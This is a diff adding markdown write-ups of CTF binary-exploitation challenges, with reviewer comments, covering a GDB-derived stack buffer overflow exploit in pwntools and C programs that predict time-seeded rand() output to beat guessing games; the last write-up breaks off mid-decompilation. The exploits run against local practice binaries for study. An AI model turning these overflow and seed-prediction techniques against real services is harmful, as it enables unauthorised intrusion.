+ There is NO WARRANTY, to the extent permitted by law.
+ Type "show copying" and "show warranty" for details.
+ This GDB was configured as "x86_64-linux-gnu".
+ Type "show configuration" for configuration details.
+ For bug reporting instructions, please see:
+ .
+ Find the GDB manual and other documentation resources online at:
+ .
+
+ For help, type "help".
+ Type "apropos word" to search for commands related to "word"...
+ GEF for linux ready, type `gef' to start, `gef config' to configure
+ 92 commands loaded for GDB 10.1.90.20210103-git using Python engine 3.9
+ Reading symbols from warmup...
+ (No debugging symbols found in warmup)
+ gef➤
+ gef➤ disas main
+ Dump of assembler code for function main:
+ 0x000000000040061d <+0>: push rbp
+ 0x000000000040061e <+1>: mov rbp,rsp
+ 0x0000000000400621 <+4>: add rsp,0xffffffffffffff80
+ 0x0000000000400625 <+8>: mov edx,0xa
+ 0x000000000040062a <+13>: mov esi,0x400741
+ 0x000000000040062f <+18>: mov edi,0x1
+ 0x0000000000400634 <+23>: call 0x4004c0
+ 0x0000000000400639 <+28>: mov edx,0x4
+ 0x000000000040063e <+33>: mov esi,0x40074c
+ 0x0000000000400643 <+38>: mov edi,0x1
+ 0x0000000000400648 <+43>: call 0x4004c0
+ 0x000000000040064d <+48>: lea rax,[rbp-0x80]
+ 0x0000000000400651 <+52>: mov edx,0x40060d
+ 0x0000000000400656 <+57>: mov esi,0x400751
+ 0x000000000040065b <+62>: mov rdi,rax
+ 0x000000000040065e <+65>: mov eax,0x0
+ 0x0000000000400663 <+70>: call 0x400510
+ 0x0000000000400668 <+75>: lea rax,[rbp-0x80]
+ 0x000000000040066c <+79>: mov edx,0x9
+ 0x0000000000400671 <+84>: mov rsi,rax
+ 0x0000000000400674 <+87>: mov edi,0x1
+ 0x0000000000400679 <+92>: call 0x4004c0
+ 0x000000000040067e <+97>: mov edx,0x1
+ 0x0000000000400683 <+102>: mov esi,0x400755
+ 0x0000000000400688 <+107>: mov edi,0x1
+ 0x000000000040068d <+112>: call 0x4004c0
+ 0x0000000000400692 <+117>: lea rax,[rbp-0x40]
+ 0x0000000000400696 <+121>: mov rdi,rax
+ 0x0000000000400699 <+124>: mov eax,0x0
+ 0x000000000040069e <+129>: call 0x400500
+ 0x00000000004006a3 <+134>: leave
+ 0x00000000004006a4 <+135>: ret
+ gef➤ b *main +134
+ Breakpoint 1 at 0x4006a3
+
+
+here we want the first breakpoint right before the return call at +134, then we run the binary:
+
+
+ gef➤ r
+ Starting program: /home/nothing/binexp/2/warmup/warmup
+ -Warm Up-
+ WOW:0x40060d
+ >13371337
+
+ Breakpoint 1, 0x00000000004006a3 in main ()
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $rax : 0x00007fffffffe0b0 → "13371337"
+ $rbx : 0x0
+ $rcx : 0x00007ffff7fac980 → 0x00000000fbad2288
+ $rdx : 0x0
+ $rsp : 0x00007fffffffe070 → "0x40060d\n"
+ $rbp : 0x00007fffffffe0f0 → 0x00000000004006b0 → <__libc_csu_init+0> push r15
+ $rsi : 0x31373333
+ $rdi : 0x00007ffff7faf680 → 0x0000000000000000
+ $rip : 0x00000000004006a3 → leave
+ $r8 : 0x00007fffffffe0b0 → "13371337"
+ $r9 : 0x0
+ $r10 : 0x6e
+ $r11 : 0x246
+ $r12 : 0x0000000000400520 → <_start+0> xor ebp, ebp
+ $r13 : 0x0
+ $r14 : 0x0
+ $r15 : 0x0
+ $eflags: [zero carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
+ $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0x00007fffffffe070│+0x0000: "0x40060d\n" ← $rsp
+ 0x00007fffffffe078│+0x0008: 0x000000000000000a
+ 0x00007fffffffe080│+0x0010: 0x0000000000000000
+ 0x00007fffffffe088│+0x0018: 0x0000000000000000
+ 0x00007fffffffe090│+0x0020: 0x0000000000000000
+ 0x00007fffffffe098│+0x0028: 0x0000000000000000
+ 0x00007fffffffe0a0│+0x0030: 0x0000000000000000
+ 0x00007fffffffe0a8│+0x0038: 0x00000000000000c2
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
+ 0x400694 rex.RB ror BYTE PTR [r8-0x77], 0xc7
+ 0x400699 mov eax, 0x0
+ 0x40069e call 0x400500
+ → 0x4006a3 leave
+ 0x4006a4 ret
+ 0x4006a5 nop WORD PTR cs:[rax+rax*1+0x0]
+ 0x4006af nop
+ 0x4006b0 <__libc_csu_init+0> push r15
+ 0x4006b2 <__libc_csu_init+2> mov r15d, edi
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "warmup", stopped 0x4006a3 in main (), reason: BREAKPOINT
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x4006a3 → main()
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ gef➤
+
+
+We gave it a simple pattern '13371337' so now we search for that pattern:
+
+
+ gef➤ search-pattern 13371337
+ [+] Searching '13371337' in memory
+ [+] In '[heap]'(0x602000-0x623000), permission=rw-
+ 0x6022a0 - 0x6022aa → "13371337\n"
+ [+] In '[stack]'(0x7ffffffde000-0x7ffffffff000), permission=rw-
+ **0x7fffffffe0b0** - 0x7fffffffe0b8 → "13371337"
+
+ gef➤ i f
+ Stack level 0, frame at 0x7fffffffe100:
+ rip = 0x4006a3 in main; saved rip = 0x7ffff7e14d0a
+ Arglist at 0x7fffffffe0f0, args:
+ Locals at 0x7fffffffe0f0, Previous frame's sp is 0x7fffffffe100
+ Saved registers:
+ rbp at 0x7fffffffe0f0, rip at **0x7fffffffe0f8**
+
+
+
+Now let's calculate the offset:
+
+
+ >>> hex(0x7fffffffe0f8 - 0x7fffffffe0b0)
+ '0x48'
+
+
+So now we know that after 0x48 bytes of input, we start overwriting the return address, so we can write the following exploit:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/warmup]
+ → vim exploit.py
+
+
+
+
+ from pwn import *
+
+ target = process('./warmup')
+
+ # Make the payload
+ payload = b""
+ payload += b"0"*0x48 # Overflow the buffer up to the return address
+ payload += p64(0x40060d) # Overwrite the return address with the address of the `easy` function
+
+ # Send the payload
+ target.sendline(payload)
+
+ target.interactive()
+
+
+
+Then run it:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/3 ] [binexp/2/warmup]
+ → python3 exploit.py
+ [+] Starting local process './warmup': pid 78458
+ [*] Switching to interactive mode
+ -Warm Up-
+ WOW:0x40060d
+ >flag{g0ttem_b0yz}
+ [*] Got EOF while reading in interactive
+ $ exit
+ [*] Process './warmup' stopped with exit code -11 (SIGSEGV) (pid 78458)
+ [*] Got EOF while sending in interactive
+
+
+and we got the flag !
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
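Review bot: the sentence "With this bug we can reach the return address (the address after the ret call)" misdefines the return address: it is the saved RIP that `ret` pops, i.e. the address of the instruction following the `call main` in the caller, sitting just above the saved RBP at 0x7fffffffe0f8 in the `i f` output. Worth adding, because it is the cleanest cross-check on the offset: Ghidra's `Stack[-0x48]` for local_48 is measured from the entry stack pointer, where the return address sits at offset 0, so the 0x48 computed from `search-pattern` and `i f` is exactly what the listing already implied, while the disassembly's `lea rax,[rbp-0x40]` is the same buffer measured from RBP (0x40 plus 8 bytes of saved RBP gives 0x48). Smaller points: "Here we see the main function disassembled code" refers to Ghidra's decompiled C, not disassembly; the closing quote is missing in "the 'easy function"; and the `exit code -11 (SIGSEGV)` after the flag is expected, since the saved return address was replaced and `easy` has nothing valid to return to, so one sentence saying so would stop readers from thinking the exploit half-failed. The empty ` ![]()` placeholder after the `file` output and the two "## Title / text" stubs at the end are leftover template content.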
diff --git a/3/0.md b/3/0.md
new file mode 100644
index 0000000..bd2c701
--- /dev/null
+++ b/3/0.md
@@ -0,0 +1,84 @@
+# Binary Exploitation
+
+## Downloading the binary file
+
+
+
+
+` ![]()
+
+## Solution
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
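Review bot: this file is an unfilled template: the "## Downloading the binary file" and "## Solution" sections contain only blank lines and eleven empty `![]()` image links, and the two trailing "## Title / text" sections are stubs. Either fill it in before merging or leave it out of this commit so nothing links to an empty page.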
diff --git a/3/0.png b/3/0.png
new file mode 100644
index 0000000..e6e8bc3
Binary files /dev/null and b/3/0.png differ
diff --git a/3/1.png b/3/1.png
new file mode 100644
index 0000000..82cf4d1
Binary files /dev/null and b/3/1.png differ
diff --git a/3/2.png b/3/2.png
new file mode 100644
index 0000000..26b5ab3
Binary files /dev/null and b/3/2.png differ
diff --git a/3/h3.md b/3/h3.md
new file mode 100644
index 0000000..2991301
--- /dev/null
+++ b/3/h3.md
@@ -0,0 +1,219 @@
+# h3 time
+
+## Downloading the binary file
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/time]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/09-bad_seed/h3_time/time
+ --2021-03-07 12:51:05-- https://github.com/guyinatuxedo/nightmare/raw/master/modules/09-bad_seed/h3_time/time
+ Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
+ Resolving github.com (github.com)... 140.82.121.3
+ Connecting to github.com (github.com)|140.82.121.3|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/09-bad_seed/h3_time/time [following]
+ --2021-03-07 12:51:05-- https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/09-bad_seed/h3_time/time
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.108.133, 185.199.110.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 8864 (8.7K) [application/octet-stream]
+ Saving to: ‘time’
+
+ time 100%[================================================================>] 8.66K --.-KB/s in 0.006s
+
+ 2021-03-07 12:51:06 (1.41 MB/s) - ‘time’ saved [8864/8864]
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/time]
+ → file time
+ time: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=4972fe3e2914c74bc97f0623f0c4643c40300dab, not stripped
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/time]
+ → chmod +x time
+
+
+
+` ![]()
+
+## Solution
+
+First let's take a look at the binary with pwn checksec as well as running it:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/time]
+ → pwn checksec time; ./time
+ [*] '/home/nothing/binexp/3/time/time'
+ Arch: amd64-64-little
+ RELRO: Partial RELRO
+ Stack: Canary found
+ NX: NX enabled
+ PIE: No PIE (0x400000)
+ Welcome to the number guessing game!
+ I'm thinking of a number. Can you guess it?
+ Guess right and you get a flag!
+ Enter your number: 1234
+ Your guess was 1234.
+ Looking for 34981616.
+ Sorry. Try again, wrong guess!
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/time]
+ → ./time
+ Welcome to the number guessing game!
+ I'm thinking of a number. Can you guess it?
+ Guess right and you get a flag!
+ Enter your number: 4321
+ Your guess was 4321.
+ Looking for 994945792.
+ Sorry. Try again, wrong guess!
+
+
+
+
+So here we see that we have a 64bit binary. When we run it, it prompts us to guess a number. Let's check what ghidra finds on that binary:
+
+
+ undefined8 main(void)
+
+ {
+ time_t tVar1;
+ long in_FS_OFFSET;
+ uint local_18;
+ uint local_14;
+ long local_10;
+
+ local_10 = *(long *)(in_FS_OFFSET + 0x28);
+ tVar1 = time((time_t *)0x0);
+ srand((uint)tVar1);
+ local_14 = rand();
+ puts("Welcome to the number guessing game!");
+ puts("I\'m thinking of a number. Can you guess it?");
+ puts("Guess right and you get a flag!");
+ printf("Enter your number: ");
+ fflush(stdout);
+ __isoc99_scanf(&DAT;_00400bbc,&local;_18);
+ printf("Your guess was %u.\n",(ulong)local_18);
+ printf("Looking for %u.\n",(ulong)local_14);
+ fflush(stdout);
+ if (local_14 == local_18) {
+ puts("You won. Guess was right! Here\'s your flag:");
+ giveFlag();
+ }
+ else {
+ puts("Sorry. Try again, wrong guess!");
+ }
+ fflush(stdout);
+ if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
+ /* WARNING: Subroutine does not return */
+ __stack_chk_fail();
+ }
+ return 0;
+ }
+
+
+
+Here we see something interesting, first of all the **rand** function which should give a random number, as well as the scanf call with the %u format string stored in local_18. Basically the main function creates a random number, then prompts us for some number to store into local_18, and then it checks if the 2 numbers are the same. If they are we enter the giveFlag function:
+
+
+ void giveFlag(void)
+
+ {
+ FILE *__stream;
+ long in_FS_OFFSET;
+ char local_118 [264];
+ long local_10;
+
+ local_10 = *(long *)(in_FS_OFFSET + 0x28);
+ memset(local_118,0,0x100);
+ __stream = fopen("/home/h3/flag.txt","r");
+ if (__stream == (FILE *)0x0) {
+ puts("Flag file not found! Contact an H3 admin for assistance.");
+ }
+ else {
+ fgets(local_118,0x100,__stream);
+ fclose(__stream);
+ puts(local_118);
+ }
+ if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
+ /* WARNING: Subroutine does not return */
+ __stack_chk_fail();
+ }
+ return;
+ }
+
+
+
+Here we see that this function reads and prints out the flag file from **/home/h3/flag.txt** What we need to figure out is what the output of the **rand** function will be. Thing is, the output of the ran dunction is not actually random. The output is based off a value called a 'seed' which it uses to determine what number sequence to generate. SO if we can get the same seed, we can get **rand** to generate the same sequence of numbers. Looking at the decompiled code, we see the following:
+
+
+ tVar1 = time((time_t *)0x0);
+ srand((uint)tVar1);
+
+
+
+Here we see tVar1 gets the current time as a seed, therefore we can write a C program that uses the current time as a seed, and output a digit and redirect the output to the target:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/time]
+ → vim exploit.c
+
+
+
+
+ #include<****stdio.h>
+ #include <****time.h>
+ #include <****stdlib.h>
+ #include <****stdint.h>
+ #include <****string.h>
+
+ int main()
+ {
+ uint32_t rand_num;
+ srand(time(0)); //seed with current time
+ rand_num = rand();
+ uint32_t ans;
+ printf("%d\n", rand_num);
+ }
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/time]
+ → gcc exploit.c -o exploit
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/time]
+ → ./exploit
+ 1779237112
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/time]
+ → ./exploit
+ 1476399991
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/time]
+ → ./exploit | ./time
+ Welcome to the number guessing game!
+ I'm thinking of a number. Can you guess it?
+ Guess right and you get a flag!
+ Enter your number: Your guess was 1333337650.
+ Looking for 1333337650.
+ You won. Guess was right! Here's your flag:
+ ${g0tt3m_boyz}
+
+
+
+And that's it ! We managed to print the flag.
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
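Review bot: the include lines in exploit.c are corrupted by markdown emphasis (`#include<****stdio.h>`, `#include <****time.h>`) and will not compile if copied as rendered; put the source in a fenced code block so `<` and `*` stay literal. In the program itself `uint32_t ans;` is unused and `printf("%d\n", rand_num)` prints a `uint32_t` with `%d`; use `%u` to match the target's `Looking for %u.` format (harmless here because rand() never exceeds RAND_MAX, but it draws a compiler warning). Two caveats belong in the text because they are the whole reason the attack works: both processes must call `time(NULL)` within the same second, which `./exploit | ./time` guarantees only because the shell starts them together, so against a remote service one has to allow for latency and clock skew (for example by trying the seed for the current second and its neighbours); and the predicted value matches only if the attacker's `rand()` is the same implementation as the target's, which holds here because both run against the same glibc. Typo: "the output of the ran dunction" should read "the rand function". The "## Title / text / ` ![]()" stubs at the end are template leftovers.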
diff --git a/3/prep.md b/3/prep.md
new file mode 100644
index 0000000..17edb98
--- /dev/null
+++ b/3/prep.md
@@ -0,0 +1,301 @@
+# Sunshine CTF 2017 Prepared
+
+## Downloading the binary file
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/prep]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/09-bad_seed/sunshinectf17_prepared/prepared
+ --2021-03-07 13:57:41-- https://github.com/guyinatuxedo/nightmare/raw/master/modules/09-bad_seed/sunshinectf17_prepared/prepared
+ Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
+ Resolving github.com (github.com)... 140.82.121.3
+ Connecting to github.com (github.com)|140.82.121.3|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/09-bad_seed/sunshinectf17_prepared/prepared [following]
+ --2021-03-07 13:57:41-- https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/09-bad_seed/sunshinectf17_prepared/prepared
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.110.133, 185.199.111.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 12888 (13K) [application/octet-stream]
+ Saving to: ‘prepared’
+
+ prepared 100%[================================================================>] 12.59K --.-KB/s in 0.001s
+
+ 2021-03-07 13:57:42 (16.2 MB/s) - ‘prepared’ saved [12888/12888]
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/prep]
+ → file prepared
+ prepared: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=9cd9483ed0e7707d3addd2de44da60d2575652fb, not stripped
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/prep]
+ → chmod +x prepared
+
+
+
+` ![]()
+
+## Solution
+
+So let's first run pwn checksec on the binary before executing it to see what it does:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/prep]
+ → pwn checksec prepared
+ [*] '/home/nothing/binexp/3/prep/prepared'
+ Arch: amd64-64-little
+ RELRO: Full RELRO
+ Stack: Canary found
+ NX: NX enabled
+ PIE: PIE enabled
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/prep]
+ → ./prepared
+ 0 days without an incident.
+ 123
+ Well that didn't take long.
+ You should have used 63.
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/prep]
+ → ./prepared
+ 0 days without an incident.
+ 63
+ Well that didn't take long.
+ You should have used 67.
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/prep]
+ → ./prepared
+ 0 days without an incident.
+ 67
+ Well that didn't take long.
+ You should have used 24.
+
+
+
+Here we see that this is a 64 bit binary with everything enabled (full relro, canary, nx and pie). It prompts us for input to make us guess a random number, let's take a look at it in ghidra:
+
+
+
+And here we get the following code for the main function:
+
+
+ undefined8 main(void)
+
+ {
+ int iVar1;
+ time_t tVar2;
+ FILE *__stream;
+ char *pcVar3;
+ long in_FS_OFFSET;
+ uint local_464;
+ char local_448 [64];
+ char local_408 [512];
+ char local_208 [504];
+ long local_10;
+
+ local_10 = *(long *)(in_FS_OFFSET + 0x28);
+ tVar2 = time((time_t *)0x0);
+ srand((uint)tVar2);
+ local_464 = 0;
+ while ((int)local_464 < 0x32) {
+ iVar1 = rand();
+ printf("%d days without an incident.\n",(ulong)local_464);
+ sprintf(local_208,"%d",(ulong)(uint)(iVar1 % 100));
+ __isoc99_scanf(" %10s",local_408);
+ strtok(local_408,"\n");
+ iVar1 = strcmp(local_208,local_408);
+ if (iVar1 != 0) {
+ puts("Well that didn\'t take long.");
+ printf("You should have used %s.\n",local_208);
+ /* WARNING: Subroutine does not return */
+ exit(0);
+ }
+ local_464 = local_464 + 1;
+ }
+ puts("How very unpredictable. Level Cleared");
+ __stream = fopen("flag.txt","r");
+ while( true ) {
+ pcVar3 = fgets(local_448,0x32,__stream);
+ if (pcVar3 == (char *)0x0) break;
+ printf("%s",local_448);
+ }
+ if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
+ /* WARNING: Subroutine does not return */
+ __stack_chk_fail();
+ }
+ return 0;
+ }
+
+
+Just like in the previous 2 challenges, time is declared as a seed with the srand function, and then it uses **rand** to generate values that are modded by 100 (value%100), and we have to guess it in a loop 50 times, So in order to guess the rand number 50 times in a row, this is based off of the seed, and since the seed is simply the current time, we can write a simple C program to get the seed and generate the numbers it expects:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/prep]
+ → vim exploit.c
+
+
+
+
+ ****#include <****stdio.h>
+ #include <****stdlib.h>
+ #include <****time.h>
+ #include <****string.h>
+
+ int main(void)
+ {
+ int i, out;
+ time_t var0 = time(NULL);
+ srand(var0);
+
+ for (i = 0; i < 50; i++)
+ {
+ out = rand() % 100;
+ printf("%d\n", out);
+ }
+
+ return 0;
+ }
+
+
+
+Here we compile it with gcc:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/prep]
+ → gcc exploit.c -o exploit
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/prep]
+ → ./exploit
+ 83
+ 93
+ 92
+ 55
+ 70
+ 63
+ 4
+ 64
+ 54
+ 21
+ 87
+ 42
+ 77
+ 17
+ 74
+ 86
+ 57
+ 18
+ 72
+ 7
+ 52
+ 76
+ 46
+ 78
+ 81
+ 83
+ 19
+ 55
+ 20
+ 14
+ 21
+ 55
+ 59
+ 13
+ 10
+ 81
+ 76
+ 67
+ 46
+ 83
+ 88
+ 33
+ 77
+ 17
+ 2
+ 3
+ 4
+ 59
+ 21
+ 28
+
+
+
+Now let's pipe it into the stdin of our binary:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/prep]
+ → ./exploit | ./prepared
+ 0 days without an incident.
+ 1 days without an incident.
+ 2 days without an incident.
+ 3 days without an incident.
+ 4 days without an incident.
+ 5 days without an incident.
+ 6 days without an incident.
+ 7 days without an incident.
+ 8 days without an incident.
+ 9 days without an incident.
+ 10 days without an incident.
+ 11 days without an incident.
+ 12 days without an incident.
+ 13 days without an incident.
+ 14 days without an incident.
+ 15 days without an incident.
+ 16 days without an incident.
+ 17 days without an incident.
+ 18 days without an incident.
+ 19 days without an incident.
+ 20 days without an incident.
+ 21 days without an incident.
+ 22 days without an incident.
+ 23 days without an incident.
+ 24 days without an incident.
+ 25 days without an incident.
+ 26 days without an incident.
+ 27 days without an incident.
+ 28 days without an incident.
+ 29 days without an incident.
+ 30 days without an incident.
+ 31 days without an incident.
+ 32 days without an incident.
+ 33 days without an incident.
+ 34 days without an incident.
+ 35 days without an incident.
+ 36 days without an incident.
+ 37 days without an incident.
+ 38 days without an incident.
+ 39 days without an incident.
+ 40 days without an incident.
+ 41 days without an incident.
+ 42 days without an incident.
+ 43 days without an incident.
+ 44 days without an incident.
+ 45 days without an incident.
+ 46 days without an incident.
+ 47 days without an incident.
+ 48 days without an incident.
+ 49 days without an incident.
+ How very unpredictable. Level Cleared
+ [1] 2904178 done ./exploit |
+ 2904179 segmentation fault (core dumped) ./prepared
+
+
+
+And that's it! we have been able to guess the random number 50 times.
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
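Review bot: the run ends in `segmentation fault (core dumped) ./prepared` with no flag printed, and the closing sentence ("And that's it! we have been able to guess the random number 50 times.") does not explain why. The decompilation shows the cause: `__stream = fopen("flag.txt","r");` has no NULL check and its result goes straight into `fgets(local_448,0x32,__stream)`, so with no flag.txt in the working directory the program dereferences a NULL FILE* right after "Level Cleared". Create a flag.txt beside the binary, or at least state that the crash is the missing file and not a failed guess, so the writeup ends with the flag being read. Same markdown corruption as the other files: `****#include <****stdio.h>` will not compile as rendered, so fence the source. One point worth spelling out for the prediction: the target compares strings, `strcmp(local_208,local_408)` against `sprintf(local_208,"%d",...)` after `scanf(" %10s",local_408)`, so each guess must be the decimal number on its own line exactly as `printf("%d\n", out)` emits it, and all 50 values derive from the single `srand(time(NULL))` at startup, so only the first second matters for keeping the two processes in sync.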
diff --git a/3/tux.md b/3/tux.md
new file mode 100644
index 0000000..4720599
--- /dev/null
+++ b/3/tux.md
@@ -0,0 +1,278 @@
+# hsctf 2019 tux talk show
+
+## Downloading the binary file
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/tux]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/09-bad_seed/hsctf19_tuxtalkshow/tuxtalkshow
+
+ --2021-03-07 13:24:34-- https://github.com/guyinatuxedo/nightmare/raw/master/modules/09-bad_seed/hsctf19_tuxtalkshow/tuxtalkshow
+ Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
+ Resolving github.com (github.com)... 140.82.121.3
+ Connecting to github.com (github.com)|140.82.121.3|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/09-bad_seed/hsctf19_tuxtalkshow/tuxtalkshow [following]
+ --2021-03-07 13:24:35-- https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/09-bad_seed/hsctf19_tuxtalkshow/tuxtalkshow
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.110.133, 185.199.108.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 21112 (21K) [application/octet-stream]
+ Saving to: ‘tuxtalkshow’
+
+ tuxtalkshow 100%[================================================================>] 20.62K --.-KB/s in 0.003s
+
+ 2021-03-07 13:24:35 (5.81 MB/s) - ‘tuxtalkshow’ saved [21112/21112]
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/tux]
+ → file tuxtalkshow
+ tuxtalkshow: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=8c0d2b94392e01fecb4b54999cc8afe6fa99653d, for GNU/Linux 3.2.0, not stripped
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/tux]
+ → chmod +x tuxtalkshow
+
+
+
+
+` ![]()
+
+## Solution
+
+First let's run pwn checksec on the binary file before executing it to see what it does:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/tux]
+ → pwn checksec tuxtalkshow
+ [*] '/home/nothing/binexp/3/tux/tuxtalkshow'
+ Arch: amd64-64-little
+ RELRO: Partial RELRO
+ Stack: Canary found
+ NX: NX enabled
+ PIE: PIE enabled
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/tux]
+ → ./tuxtalkshow
+ Welcome to Tux Talk Show 2019!!!
+ Enter your lucky number: 13371337
+
+
+
+So here we have a 64bit binary with PIE enabled. When we run it it prompts us for a number. So let's check it out from inside of ghidra:
+
+
+
+And here we get a gigantic main function:
+
+
+ undefined8 main(void)
+
+ {
+ int iVar1;
+ time_t tVar2;
+ basic_ostream *pbVar3;
+ long in_FS_OFFSET;
+ int local_290;
+ int local_28c;
+ int local_288;
+ int local_284;
+ undefined4 local_280;
+ undefined4 local_27c;
+ undefined4 local_278;
+ undefined4 local_274;
+ undefined4 local_270;
+ undefined4 local_26c;
+ int local_268 [8];
+ basic_string local_248 [32];
+ basic_istream local_228 [520];
+ long local_20;
+
+ local_20 = *(long *)(in_FS_OFFSET + 0x28);
+ std::basic_ifstream>::basic_ifstream((char *)local_228,0x1020b0);
+ tVar2 = time((time_t *)0x0);
+ srand((uint)tVar2);
+ /* try { // try from 0010127e to 001012c0 has its CatchHandler @ 00101493 */
+ pbVar3 = std::operator<<((basic_ostream *)std::cout,"Welcome to Tux Talk Show 2019!!!");
+ std::basic_ostream>::operator<<
+ ((basic_ostream> *)pbVar3,
+ std::endl>);
+ std::operator<<((basic_ostream *)std::cout,"Enter your lucky number: ");
+ std::basic_istream>::operator>>
+ ((basic_istream> *)std::cin,&local;_290);
+ local_280 = 0x79;
+ local_27c = 0x12c97f;
+ local_278 = 0x135f0f8;
+ local_274 = 0x74acbc6;
+ local_270 = 0x56c614e;
+ local_26c = 0xffffffe2;
+ local_268[0] = 0x79;
+ local_268[1] = 0x12c97f;
+ local_268[2] = 0x135f0f8;
+ local_268[3] = 0x74acbc6;
+ local_268[4] = 0x56c614e;
+ local_268[5] = 0xffffffe2;
+ local_28c = 0;
+ while (local_28c < 6) {
+ iVar1 = rand();
+ local_268[local_28c] = local_268[local_28c] - (iVar1 % 10 + -1);
+ local_28c = local_28c + 1;
+ }
+ local_288 = 0;
+ local_284 = 0;
+ while (local_284 < 6) {
+ local_288 = local_288 + local_268[local_284];
+ local_284 = local_284 + 1;
+ }
+ if (local_288 == local_290) {
+ std::__cxx11::basic_string,std::allocator>::basic_string();
